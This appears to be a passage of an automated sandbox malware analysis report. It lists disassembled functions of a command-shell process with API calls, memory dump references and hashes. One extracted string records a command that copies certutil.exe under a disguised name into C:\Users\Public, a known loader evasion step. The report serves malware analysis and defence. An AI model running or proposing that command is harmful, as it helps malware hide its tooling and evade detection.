                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F16C
                                                                                                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E944F185
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                                                                                                        • API String ID: 1161012917-1690691951
                                                                                                                                                                        • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                        • Instruction ID: 0a4195b632bf2243f85b50ace29cecfcafb1a5084cfe2153f0882de2ec3b86ec
                                                                                                                                                                        • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                                                                                        • Instruction Fuzzy Hash: EE919123F08652CAFB159F60E8102BD6AA0AF49B59F448135DD0E827D5DF3EA84EC716
                                                                                                                                                                        Function 00007FF6E94232B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                          • Part of subcall function 00007FF6E9433578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E94232F3
                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF6E94232A4), ref: 00007FF6E9423309
                                                                                                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF6E9423384
                                                                                                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E94411DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 611521582-0
                                                                                                                                                                        • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                        • Instruction ID: 85076ccb8cd57b1e8a4b0520062ee9e0d36cde55ca5ff42f6ec19b776ebd70f4
                                                                                                                                                                        • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                                                                        • Instruction Fuzzy Hash: C6A19C63B08612CAEB188F61A8543BD66A1FF4DB49F445135DE0EC7784DF3EA449C70A
                                                                                                                                                                        Function 00007FF6E9421560 Relevance: 26.6, APIs: 14, Strings: 1, Instructions: 338fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                                                                                        • String ID: \\?\
                                                                                                                                                                        • API String ID: 628682198-4282027825
                                                                                                                                                                        • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                                                                        • Instruction ID: 8b23b2eca7631305e547478c69c4c8f33402ff62c3f9f3d7d4656906ec964833
                                                                                                                                                                        • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 85E18C63A08682D6EB649F64D8943F963A0FF89749F404139DA0EC77D4EE3EE649C305
                                                                                                                                                                        Function 00007FF6E944AFBC Relevance: 26.0, APIs: 17, Instructions: 537COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 16309207-0
                                                                                                                                                                        • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                                                                                        • Instruction ID: 949ee9b799f14aac2f643bc95a1cdabee99a18812a0dd246a870bcaebacf0362
                                                                                                                                                                        • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                                                                                        • Instruction Fuzzy Hash: CA227B63B08B86C6EB259F25D8543F963A0FF49B84F404135DA0E8BB95EE3DE149C706
                                                                                                                                                                        Function 00007FF6E942CE10 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 337COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                                                                                        • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                        • API String ID: 3863671652-4137775220
                                                                                                                                                                        • Opcode ID: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                                                                                                                                                        • Instruction ID: 5189ddbaa255038b5fcee96fab94b60473c9722663eb10b7bf8067f3857c590a
                                                                                                                                                                        • Opcode Fuzzy Hash: feb1bbf7feb49ee9d99dd0502c92dc49cdd19241ad0cb0e0275a55cbab1dd980
                                                                                                                                                                        • Instruction Fuzzy Hash: ADE1DD63A09642C6FB64AF64A4587B822A0BF89745F054135DE0DC76E1EF3EE84DC70B
                                                                                                                                                                        Function 00007FF6E9423410 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 160windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                        • String ID: $Application$System
                                                                                                                                                                        • API String ID: 3538039442-1881496484
                                                                                                                                                                        • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                        • Instruction ID: a484738f6046d36edee5ec239a463ff6d17902af7ea789fabd856eca673316d1
                                                                                                                                                                        • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                                                                                        • Instruction Fuzzy Hash: F0517873A08B41D6EB218F55A40077ABAA1FF89B44F458134DE4E83794EF3ED449CB09
                                                                                                                                                                        Function 00007FF6E944D9D0 Relevance: 23.3, APIs: 10, Strings: 3, Instructions: 576fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • longjmp.MSVCRT(?,?,00000000,00007FF6E944048E), ref: 00007FF6E944DA58
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E944DAD6
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E944DAFC
                                                                                                                                                                        • memset.MSVCRT ref: 00007FF6E944DB22
                                                                                                                                                                          • Part of subcall function 00007FF6E9433A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E944EAC5,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9433A56
                                                                                                                                                                          • Part of subcall function 00007FF6E9425194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF6E94251C4
                                                                                                                                                                          • Part of subcall function 00007FF6E943823C: FindFirstFileExW.KERNELBASE ref: 00007FF6E9438280
                                                                                                                                                                          • Part of subcall function 00007FF6E943823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF6E943829D
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: _get_osfhandle.MSVCRT ref: 00007FF6E94301C4
                                                                                                                                                                          • Part of subcall function 00007FF6E94301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF6E943E904,?,?,?,?,00000000,00007FF6E9433491,?,?,?,00007FF6E9444420), ref: 00007FF6E94301D6
                                                                                                                                                                          • Part of subcall function 00007FF6E9424FE8: _get_osfhandle.MSVCRT ref: 00007FF6E9425012
                                                                                                                                                                          • Part of subcall function 00007FF6E9424FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9425030
                                                                                                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E944DDB0
                                                                                                                                                                          • Part of subcall function 00007FF6E94259E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9425A2E
                                                                                                                                                                          • Part of subcall function 00007FF6E94259E4: _open_osfhandle.MSVCRT ref: 00007FF6E9425A4F
                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E944DDEB
                                                                                                                                                                        • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E944DDFA
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E944E204
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E944E223
                                                                                                                                                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF6E944E242
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                                                                                        • String ID: %9d$%s$~
                                                                                                                                                                        • API String ID: 3651208239-912394897
                                                                                                                                                                        • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                                                                                        • Instruction ID: 68ea2a9aaa8ef33d59e18617023b1008b9f306c066bf2d6286f3d7cef347b761
                                                                                                                                                                        • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                                                                                        • Instruction Fuzzy Hash: 05425D33A08682C6EB64AF3198513EE67A0FF85744F500135DA4DC7A99DF3EE549CB06
                                                                                                                                                                        Function 00007FF6E942372C Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 396COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                                                                                        • String ID: COPYCMD$\
                                                                                                                                                                        • API String ID: 3989487059-1802776761
                                                                                                                                                                        • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                                                                        • Instruction ID: b19c15e80af4c31c34c67f2e6d59da32a5621f205c47d1eac8ce32fe79076bd4
                                                                                                                                                                        • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                                                                                        • Instruction Fuzzy Hash: 31F1C067A08786C2EB249F2594043BA67B0FF59B88F048135DE4EC7795EE3EE049C706
                                                                                                                                                                        Function 00007FF6E9433140 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 229timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                                                                                        • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                                                                                        • API String ID: 55602301-2548490036
                                                                                                                                                                        • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                        • Instruction ID: ff955b42c9620b9a1095b925c3c17963fba24564c9da0eb7068c19b3b3e7b10c
                                                                                                                                                                        • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                                                                        • Instruction Fuzzy Hash: E6A1AE33A19642D6EB20CF70E4483BA67A1FF94754F904136EA4E87694EF3DE548C70A
                                                                                                                                                                        Function 00007FF6E9451538 Relevance: 19.7, APIs: 13, Instructions: 169filememorynativeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3935429995-0
                                                                                                                                                                        • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                        • Instruction ID: 38be0df2807263b075c5f66a05abc3329269bacd6d4fc801395c7ccb26dabb62
                                                                                                                                                                        • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                                                                        • Instruction Fuzzy Hash: 8261DE67A18792C2E714DFA6A404679BBA1FF89F54F058134EE4A837A0EF3ED409C705
                                                                                                                                                                        Function 00007FF6E94235B8 Relevance: 18.2, APIs: 12, Instructions: 214COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                        • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                                                                        • Instruction ID: 38d9de5160940e62cb7d396cd05fba0c79a3484c043ebd20156ea8d47d87b45e
                                                                                                                                                                        • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D91AD73A08682C6EB688F24D8103F976A0FF59B49F004135DA4EC7794EE3ED54AC706
                                                                                                                                                                        Function 00007FF6E942B0D8 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
